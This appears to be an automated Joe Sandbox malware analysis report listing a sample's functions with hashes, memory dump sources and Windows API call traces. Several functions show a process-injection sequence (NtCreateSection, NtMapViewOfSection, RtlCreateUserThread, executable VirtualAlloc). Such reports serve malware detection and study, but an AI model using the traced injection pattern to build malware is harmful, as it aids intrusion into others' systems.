Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 00911495 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009114E6

Memory Dump Source

Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 889d807f5d3c5eeca9acaf09e5522def054425f0132dadd7a19ce2871e886e99
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 69113C79A00208FFDB01DF98C985E98BBF5AF48351F058094FA499B362D371EA90DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00419C90 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00515FEC,0041A29B), ref: 00419C98

Memory Dump Source

Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10

Non-executed Functions

Function 006B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 006B095F
GetProcAddress., xrefs: 006B09DC, 006B09DF, 006B09E4
l, xrefs: 006B0966

Memory Dump Source

Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 254654e92616fbed97a9e78bff470e723ef2f09cb09b4f77d6b80293d0aaa023
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 29316CB6900609DFEB10CF99C880AEEBBF6FF48324F24514AD441A7351D771EA85CBA4

Function 004032C7 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

s, xrefs: 004032FA

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: beaff77d49ba7ed39faf10c1c123569f036d3b6fb97e5df7d198b0b7b56d3ff2
Instruction ID: 8add8f8bd86fc176e70a0f92649c5ff525822e9121137b16056d3b79f0f57cf6
Opcode Fuzzy Hash: beaff77d49ba7ed39faf10c1c123569f036d3b6fb97e5df7d198b0b7b56d3ff2
Instruction Fuzzy Hash: F221542254C6C05FD7134B380CA8DDA7FB6AD8365A70E41EFC0C0AB4A7C635890B8359

Function 009110B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 074e46546e553bab7f225883b74a488f47149d7046245df60095b0cafcd743a2
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: F2117072740104AFD744DE55DC81FE6B3EAEB89360B298069EE04CB316D675E881C760

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 006B0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 234ba53533d4c3da5cb596b1fc6310159d7d1ff50711d85f8090656b9c3ca7e8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 0D01A7B66006048FEF21CF64C805BEB37E6FF85315F4545E5D50697381E774A9818B90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00419F20 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419F54
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419F6F
HeapDestroy.KERNEL32(00000000), ref: 00419F8E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419F9D

Memory Dump Source

Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction ID: 1bf496f261d44d5874548456f00747c7bc808a18a7fb14915401555e76d5e561
Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction Fuzzy Hash: BF018474600204EBE750EB65EC45BDA77A8E71C316F408076FA0997290DB745D88CB99

Function 00419EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

BuildCommDCBW.KERNEL32(00000000,?), ref: 00419EB4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC6

Strings

-, xrefs: 00419EFF

Memory Dump Source

Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd

Similarity

API ID: BuildCommEnvironmentFreeStrings
String ID: -
API String ID: 2991353152-2547889144
Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction ID: 22d77843ece4753af1e14c452f6c8b6cfa0dc65cd9848c352101f40df5cd50f1
Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction Fuzzy Hash: 58F02230908305A6DB20DF98D8907EF7FA5E708322F60022AE840A62C1C7384D86D3AA

Analysis Process: bsjhhuhPID: 5868, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	18.4%
Signature Coverage:	0%
Total number of Nodes:	261
Total number of Limit Nodes:	8

Executed Functions

Function 00419FC0 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 289
filewindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0041A00F
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041A0A3
GetFocus.USER32 ref: 0041A0A9
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A0B4
FindAtomW.KERNEL32(00000000), ref: 0041A0BB
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A0C3
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0041A0EA
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0041A0F3
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 0041A109
GetEnvironmentStrings.KERNEL32 ref: 0041A10F
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041A154
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041A163
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0041A16C
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A181
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041A192
SetCommState.KERNELBASE(00000000,00000000), ref: 0041A1B9
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0041A1EA
GetComputerNameA.KERNEL32(?,?), ref: 0041A1FE
CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 0041A20F
GetFileAttributesA.KERNEL32(00000000), ref: 0041A216
GetConsoleAliasExesLengthA.KERNEL32 ref: 0041A21C
GetBinaryType.KERNEL32(0041C400,?), ref: 0041A22E
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A241
GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A254
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A25C
LoadLibraryA.KERNELBASE(0041C424), ref: 0041A2E2

Strings

}$, xrefs: 0041A345
k`, xrefs: 0041A31D

Memory Dump Source

Source File: 00000005.00000002.2023966601.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_bsjhhuh.jbxd

Similarity

API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
String ID: k`$}$
API String ID: 4249349521-956986773
Opcode ID: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
Instruction ID: 4f0dc8ef0138a425de16278279ab74f02fd967f86d49b53b2b7e7158032d42a8
Opcode Fuzzy Hash: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
Instruction Fuzzy Hash: ABA19F71802524ABD725EB61DC48FDF7B78EF49311F00816AF619A2161DB381A85CFEE

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2023940674.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_bsjhhuh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

